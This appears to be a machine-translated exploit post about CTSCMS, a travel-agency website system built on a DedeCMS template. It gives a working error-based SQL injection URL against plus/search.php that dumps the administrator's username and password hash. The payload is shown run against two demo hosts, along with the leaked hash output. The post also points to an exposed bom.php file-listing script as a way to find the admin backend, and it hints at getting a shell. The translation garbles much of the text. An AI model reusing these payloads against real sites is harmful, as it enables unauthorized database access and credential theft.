China travel service website management system(CTSCMS.COM)is a professional tourism website, the program source code, travel website, travel website templates, tourism website construction service providers,focusing on the tourism e-Commerce development services to travel agencies and tour it.
Okay~CTSCMS in fact, is the use of weaving dream template, and then just own the commercial version to actually there a 5 0 0 ocean going purchase
See the update date
data/admin/ver.txt
Are generally 2 0 1 0 years, perhaps can also directly getshell
exp:
http://www.0day5.com/plus/search.php?keyword=as&typeArr[1 1 1%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+
%2 3@__admin+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@
"+]=a
Default background address is
Can’t find the background also better, in the view source of the time to find an interesting stuff
bom.php
<? php
//remove the utf-8 boms
//by magicbug at gmail dot com
if (isset($_GET[‘dir’])){ //config the basedir
$basedir=$_GET[‘dir’];
}else{
$basedir = ‘.’;
}
$auto = 1;
checkdir($basedir);
function checkdir($basedir){
if ($dh = opendir($basedir)) {
while (($file = readdir($dh)) !== false) {
if ($file != ‘.’ && $file != ‘…’){
if (! is_dir($basedir.“/”.$ file)) {
echo "filename: $basedir/$file ";
echo checkBOM(“$basedir/$file”)." <br>";
}else{
$dirname = $basedir.“/”.$ file;
checkdir($dirname);
}
}
}
closedir($dh);
}
}
function checkBOM ($filename) {
global $auto;
$contents = file_get_contents($filename);
$charset[1] = substr($contents, 0, 1);
$charset[2] = substr($contents, 1, 1);
$charset[3] = substr($contents, 2, 1);
if (ord($charset[1]) == 2 3 9 && ord($charset[2]) == 1 8 7 && ord($charset[3]) == 1 9 1) {
if ($auto == 1) {
$rest = substr($contents, 3);
rewrite ($filename, $rest);
return (“<font color=red>BOM found, automatically removed.& lt;/font>”);
} else {
return (“<font color=red>BOM found.& lt;/font>”);
}
}
else return (“BOM Not Found.”);
}
function rewrite ($filename, $data) {
$filenum = fopen($filename, “w”);
flock($filenum, LOCK_EX);
fwrite($filenum, $data);
fclose($filenum);
}
?& gt;
You can list all the files, Hey Hey~then you know, can’t find the time real-time
! [](/Article/UploadPic/2013-5/2 0 1 3 5 4 1 4 4 8 1 5 6 5 8 9 8. png)
The background will directly find sys_safe. php can find the background.
The official demo version:
http://c.ctscms.com/plus/search.php?keyword=as&typeArr[1 1 1%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+
%2 3@__admin+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@
"+]=a
Error infos: Duplicate entry ‘1|ctscms|d7f10e7cca0693eb8561’ for key ‘group_key’
http://s.ctscms.com/plus/search.php?keyword=as&typeArr[1 1 1%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+
%2 3@__admin+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@
"+]=a
Error infos: Duplicate entry ‘1|ctscms|c6364c485d55bb9df83a’ for key ‘group_key’
Background to take the shell does not interpret the~